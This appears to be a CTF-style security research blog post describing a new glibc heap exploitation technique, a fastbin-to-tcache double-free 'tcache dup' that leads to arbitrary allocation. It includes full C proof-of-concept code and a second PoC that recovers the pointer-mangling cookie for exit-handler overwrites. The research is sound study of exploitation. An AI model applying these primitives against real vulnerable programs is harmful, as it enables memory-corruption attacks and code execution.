A new way to tcache_dup

fern

Introduction

Hi all, today I will showcase a new (at least I do not believe I have seen it in writeups before, nor does it seem to be in how2heap) method of exploiting double free. In essence, this technique aims to make tcache dup great again (it’s actually quite similar to house of botcake, but is far simpler, requiring one fewer chunk allocated).

Here are the conditions to apply this attack:

  • Double free (this is the main primitive)
  • Able to allocate up to 9 chunks at any given time
  • Heap leak (to perform tcache poisoning)
  • Target address is 0x10 aligned

And here is the advantage of the attack:

  • Only write-on-alloc required, no edit functionality
  • Only single size allocate required (ie, if the challenge only allows you to allocate chunks of size N, this will still work so long as n <= 0x78, excluding metadata). This is what sets it apart most from house of botcake, as that requires that you allocate chunks of differing sizes
  • No requirements of valid free size (unlike fastbin dup into stack)
  • Works in all latest libc, tested all from 2.34 up to 2.42

Technique

So let us look at https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3860. This is the 2.35 source, but just search for the string and you can find it in other libc versions. Code says:

malloc.c
3860
3861
3862
3863
3864
3865
3866
3867
3868
3869
3870
3871
3872
3873
3874
3875
3876
3877
3878
3879
3880
3881
3882
3883
3884
3885
#if USE_TCACHE
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;

/* While bin not empty and tcache not full, copy chunks. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = *fb) != NULL)
{
if (__glibc_unlikely (misaligned_chunk (tc_victim)))
malloc_printerr ("malloc(): unaligned fastbin chunk detected 3");
if (SINGLE_THREAD_P)
*fb = REVEAL_PTR (tc_victim->fd);
else
{
REMOVE_FB (fb, pp, tc_victim);
if (__glibc_unlikely (tc_victim == NULL))
break;
}
tcache_put (tc_victim, tc_idx);
}
}
#endif

Let’s also look at the tcache_put function referenced,

malloc.c
3174
3175
3176
3177
3178
3179
3180
3181
3182
3183
3184
3185
3186
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache_key;

e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}

As can clearly be seen, there are NO protections against double free anywhere during the malloc! That means, we can bypass the double free checker in tcache, and bring back the good old malloc_dup that died long ago in 2.29!

So let’s come up with a plan. Let us start by making a target, something 0x10-aligned on stack because that is still checked in tcache_get.

1
2
3
setvbuf(stdout, NULL, _IONBF, 0);
uint64_t target[4] __attribute__ ((aligned (0x10)));
printf("Target on stack: %p\n", target);

Now we want to get something into fastbin first, so we can actually get an a->b->a chain going, to get a double free. This is just standard fastbin_dup. We must malloc a total of 9 times, to obtain 7 chunks to fill tcache, then 2 chunks to dump into double free. Then we free first 7.

1
2
3
4
5
printf("Alloc 9 chunks...\n");
uint64_t* chunks[9];
for(int i=0;i<9;i++) chunks[i] = malloc(0x30);
printf("Free 7 chunks. Now tcache is full, we go to fastbin.\n");
for(int i=0;i<7;i++) free(chunks[i]);

Performing the fastbin dup,

1
2
3
4
5
printf("Perform fastbin dup...\n");
free(chunks[7]);
free(chunks[8]);
free(chunks[7]);
printf("Now fastbin has a->b->a\n");

Now our tcache has 7 chunks, while our fastbin has a->b->a! Let us clear the tcache, so we can access fastbin,

1
2
printf("Clearing tcache...\n");
for(int i=0;i<7;i++) malloc(0x30);

So now, our tcache is empty, while our fastbin still has a->b->a. Now it is time for the magic, once we alloc a from the fastbin, b->a is moved into tcache! And since we have write-on-alloc, we can just perform classic tcache poisoning!

1
2
3
4
5
6
uint64_t* a = malloc(0x30);
printf("We alloc a = %p. Now tcache has b -> a.\n", a);
printf("Performing tcache poisoning...\n");
uint64_t ptr = (uint64_t)target;
uint64_t addr = (uint64_t)a;
a[0] = (addr >> 12) ^ ptr;

Now tcache has b->a->target! We take out b->a, and finally, we get our arbitrary allocation!

1
2
3
4
5
printf("Alloc b = %p\n", malloc(0x30));
printf("Alloc a = %p = %p. Now our next chunk should be controlled!\n", malloc(0x30), a);
uint64_t* win = malloc(0x30);
printf("We got the control! %p == %p\n", win, target);
assert((uint64_t) win == (uint64_t) target);

Further explanations

If you are like me, while studying this technique, you may have realized that after the first alloc of a, the count in tcache should only be 2 (hint: are you sure?). This means that, only b->a should picked up from tcache, not the target. But this technique still works. Why? We need to dive further into this!

So we start having fastbin with a->b->a. Where a.fd = b, and b.fd = a; this is done by our double free previously. But you must note how fastbin does NOT actually have a count field! Instead, it’s a pure singly linked list! So we can actually express it like this:

fastbin: a->b->a->b->a->b->… (note that the fastbin is circular, technically it only has 2 distinct elements a and b, but since it’s self referential, we can take it as an infinite loop)
tcache: NULL, count = 0
a.fd = b
b.fd = a

Note how tcache DOES have a count field, which increases by 1 every time something is prepended to the linked list. This is to efficiently check the limit of 7, without having to traverse the list (O(n) (if no count field) vs O(1) (with count field) operation) each time.

Then we allocate away a, as we know a’s fd is not reset.

fastbin: b->a->b->a->b->…
tcache: NULL, count = 0
a.fd = b
b.fd = a

So now, it’s time for the moving of fastbin to tcache. Chunk b is pushed to the head of tcache’s linked list, and b’s fd is set to previous head of tcache, which is NULL. Fastbin head is set to a. You may be familiar with this algorithm as one to reverse a linked list.

fastbin: a->b->NULL
tcache: b->NULL, count = 1
a.fd = b
b.fd = NULL

Next step, move head of fastbin to head of tcache, set a.fd to previous head of tcache which happens to also be b,

fastbin: b->NULL
tcache: a->b->NULL, count = 2
a.fd = b
b.fd = NULL

Finally, taking b into fastbin, and setting b.fd to previous head of tcache which is a,

fastbin: NULL
tcache: b->a->b->a->b->a->…, count = 3 - but because of count = 3, it’s effectively b->a->b->NULL
a.fd = b
b.fd = a

And that, is how the supposed b->a in fastbin is transformed into b->a->b with count = 3 in tcache! So during the tcache poisoning, by replacing a.fd with target, we get,

fastbin: NULL
tcache: b->a->target->[corruption], count = 3
a.fd = target
b.fd = a

And there we have it!

Conclusion

I feel this technique is a very good complement to house of botcake in making tcache dup great again. With this, there should be no longer any need to use fastbin_dup_into_stack. Here is the complete code for the PoC:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <stdint.h>
#define ALLOC_SZ 0x30 // any number up to 0x78
int main(){
setvbuf(stdout, NULL, _IONBF, 0);
uint64_t target[4] __attribute__ ((aligned (0x10)));
printf("Target on stack: %p\n", target);
printf("Alloc 9 chunks...\n");
uint64_t* chunks[9];
for(int i=0;i<9;i++) chunks[i] = malloc(ALLOC_SZ);
printf("Free 7 chunks. Now tcache is full, we go to fastbin.\n");
for(int i=0;i<7;i++) free(chunks[i]);
printf("Perform fastbin dup...\n");
free(chunks[7]);
free(chunks[8]);
free(chunks[7]);
printf("Now fastbin has a->b->a\n");
printf("Clearing tcache...\n");
for(int i=0;i<7;i++) malloc(ALLOC_SZ);
printf("Now, we allocate another chunk. This will pull from the fastbin, and cause all the fastbin chunks to be transferred to tcache!\n");
printf("See https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3861 for more info.\n");
printf("Note that double free protection within tcache is NOT activated during this!\n");
uint64_t* a = malloc(ALLOC_SZ);
printf("We alloc a = %p. Now tcache has b->a->b, count = 3.\n", a);
printf("Performing tcache poisoning...\n");
uint64_t ptr = (uint64_t)target;
uint64_t addr = (uint64_t)a;
a[0] = (addr >> 12) ^ ptr;
printf("Alloc b = %p\n", malloc(ALLOC_SZ));
printf("Alloc a = %p = %p. Now our next chunk should be controlled!\n", malloc(ALLOC_SZ), a);
uint64_t* win = malloc(ALLOC_SZ);
printf("We got the control! %p == %p\n", win, target);
assert((uint64_t) win == (uint64_t) target);
}

also, do i get to name this house of fern or something

A small bonus

So while studying libc, I also came across potential new method for WWW2exec. It’s just a reskin of common exit handler, initial+24 override method, but I realize that first function pointer (ie what’s there before override) can reveal the PTR_MANGLE cookie already, this is helpful especially in new libc where TLS is no longer at constant offset from libc.

The first function pointer goes to _dl_fini, which is in ld, and as of libc 2.41, is still at constant offset from libc base, so just a libc leak is sufficient. But the issue with this method is, initial+24 is not 0x10 aligned (at least in my libc), so printf leaking of initial+24 is impossible, as the value at initial+16 is 0x4, many many null bytes. But I think it is still applicable to some challenge which alloc a struct instead of char*. So here is a simple PoC:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include <stdio.h>
#define INITIAL_OFFSET 0x1d42e0
#define DL_FINI_OFFSET 0x20c680
#define PRINTF_OFFSET 0x525b0
#define ull unsigned long long
ull findKey(ull unmangled_v, ull mangled_v){
ull rotated_val = (mangled_v >> 0x11) | (mangled_v << (64 - 0x11));
return rotated_val ^ unmangled_v;
}
int main(){
ull libc_base = (ull)&printf - PRINTF_OFFSET;
printf("LIBC BASE: %p\n", libc_base);
ull initial_plus_24 = libc_base + INITIAL_OFFSET + 24;
printf("initial+24: %p\n", initial_plus_24);
ull mangled = *(ull*)initial_plus_24;
printf("MANGLED: %p\n", mangled);
printf("ENCRYPTION KEY: %p\n", findKey(libc_base + DL_FINI_OFFSET, mangled));
asm("int3");
}

Of course, offsets need to be changed for your libc, I am using 2.35 on Debian 12.